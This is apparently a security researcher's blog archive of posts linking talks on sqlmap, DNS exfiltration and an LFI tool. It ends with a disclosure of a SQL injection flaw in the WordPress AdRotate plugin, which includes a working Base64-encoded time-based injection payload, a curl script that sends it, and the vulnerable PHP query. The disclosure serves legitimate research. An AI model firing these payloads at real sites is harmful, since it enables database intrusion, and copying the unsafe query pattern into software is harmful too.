Thursday, September 19, 2013

Heuristic methods used in sqlmap

You can find slides for my talk "Heuristic methods used in sqlmap" held at FSec 2013 conference (Croatia / Varazdin 19th September 2013) here:

Tuesday, May 28, 2013

sqlmap - Under the Hood

You can find slides for my talk "sqlmap - Under the Hood" held at PHDays 2013 conference (Russia / Moscow 23rd–24th May 2013) here:

Tuesday, April 9, 2013

Panoptic


Panoptic is an open source penetration testing tool that automates the process of search and retrieval of content for common log and config files through LFI vulnerability. Official introductionary post can be found here. Also, you can find a sample run here.

Tool was made in collaboration with Roberto Salgado (@LightOS), while I have to say that he is responsible for the idea itself.

Monday, October 29, 2012

Spot the Web Vulnerability

You can find slides for my talk "Spot the Web Vulnerability" at Hacktivity 2012 conference (Hungary / Budapest 12th–13th October 2012) here:

Tuesday, June 5, 2012

Data Retrieval over DNS in SQL Injection Attacks

You can find paper titled "Data Retrieval over DNS in SQL Injection Attacks" made and presented at PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) here:

DNS exfiltration using sqlmap

You can find slides (together with link to video presentation) for my talk "DNS exfiltration using sqlmap" held at PHDays 2012 conference (Russia / Moscow 30th–31st May 2012) here:

Monday, November 14, 2011

WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability

# Exploit Title: WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability
# Date: 2011-11-8
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip
# Version: 3.6.6 (tested)
# Note: parameter $_GET["track"] has to be Base64 encoded

---
PoC
---
http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EI
DE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpK
SksMCkj

e.g.
#!/bin/bash
payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
#"
encoded=`echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,
112))),0)#" | base64 -w 0`
curl http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$enc
oded

---------------
Vulnerable code
---------------

if(isset($_GET['track']) OR $_GET['track'] != '') {
    $meta = base64_decode($_GET['track']);
    ...
    list($ad, $group, $block) = explode("-", $meta);
    ...
    $bannerurl = $wpdb->get_var($wpdb->prepare("SELECT `link` FROM `".$prefix."a
drotate` WHERE `id` = '".$ad."' LIMIT 1;")); //wrong (mis)usage of wpdb->prepare
()
p.s. tried to contact author and WordPress team but without any luck